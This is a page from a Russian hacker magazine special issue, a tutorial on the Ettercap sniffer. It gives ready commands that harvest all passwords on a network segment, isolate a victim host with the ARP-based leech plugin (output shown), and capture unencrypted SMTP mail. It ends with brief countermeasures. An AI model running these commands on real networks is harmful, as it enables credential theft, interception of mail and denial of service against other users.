Архив спецвыпуска журнала Хакер на www.realsoft.by.ru, номер #025, стр. 025-034-4, СНИФФЕРЫ

СНИФФЕРЫ - вынюхаем все!

ManderX (forother@fromru.com)

Спецвыпуск Xakep, номер #025, стр. 025-034-4

А теперь ребут, и быстрее в линух или что у тебя там? Сейчас мы займемся не менее популярным сниффаком - Ettercap. Для начала некоторые его опции:

-a, -s, -m - различные виды прослушивания (выше я давал линк, там и можешь про них прочитать);

-N - запускать сниффер без псевдографики;

-z - запуск в спокойном режиме;

-d - не преобразовывать IP-адреса в имена;

-i - сетевой интерфейс;

-l - вывести список хостов в сети;

-C - собирать все имена и пароли пользователей;

-f - определение операционной системы удаленного хоста;

-p - работа с плагинами;

-L - записывать в лог, имеющий формат: год-месяц-день-collected-pass.log

Теперь рассмотрим некоторые виды использования этого сниффера. Сначала будем перехватывать все пароли в нашем сегменте сети и записывать в лог:

ettercap - NdzsCLi eth0

Определяем операционную систему хоста с IP-адресом 127.0.0.1:

ettercap - Ndzsfi eth0 127.0.0.1

Смотрим установленные плагины и описания к ним:

ettercap - N -p list

Рассмотрим один из плагинов - leech, он изолирует удаленный хост от сети. Пропинговав хост, видим, что он в сети. Запускаем плагин:

ettercap -Ndp leech 192.168.6.89

Your IP: 192.168.6.81 MAC: 00:50:BF:4A:48:F3 Iface: ed0

Starting ./ec_leech.so plugin...

Building host list for netmask 255.255.255.0, please wait...

Sending 255 ARP request...

Listening for replies...

Isolating host 192.168.6.89... Press return to stop

Ждем-с пару секондз и жмем ^C, усе, сетевой интерфейс перестает работать на некоторое время, но ОС и приложения продолжают работать нормально, этого "некоторого времени" хватает на заполучение ip-адреса жертвы. Пингуем для проверки!

PING 192.168.6.89 (192.168.6.89): 56 data bytes

---192.168.6.89 ping statistics---

4 packets transmitted, 0 packet received, 100% packet loss

Для перехвата незашифрованных почтовых сообщении будем юзать:

./ettercap -Nzds <IP-адрес почтового сервера>:<port почтового сервера> <IP-адрес клиента>

Пример - ./ettercap -Nzds ANY:25 ANY > /root/sniff.smtp

КОНТРМЕРЫ

Безусловно, лучший способ защиты от сниффинга - это шифрование. PGP, SSH и различные утилиты для шифрования должны стать твоими лучшими друзьями! Но есть еще способ для того, чтобы обнаружить сниффер в системе: необходимо проверить, не работает ли какое-либо из сетевых устройств в сети в неразборчивом режиме. Под линукс есть одно средство - ifconfig, эта тулза сообщает о состоянии сетевых устройств.

Вот и все! Фу... Еще хочу добавить одно слово! Снифферы представляют собой существенную угрозу безопасности в основном из-за трудности их обнаружения. Изучение способов применения "вынюхивателей" и понимание того, как они могут быть использованы против тебя, существенно поможет тебе в защите от оных. Удачи!

Лучший способ защиты от сниффинга - это шифрование. PGP, SSH и различные утилиты для шифрования должны стать твоими лучшими друзьями!

Назад на стр. 025-034-3 Содержание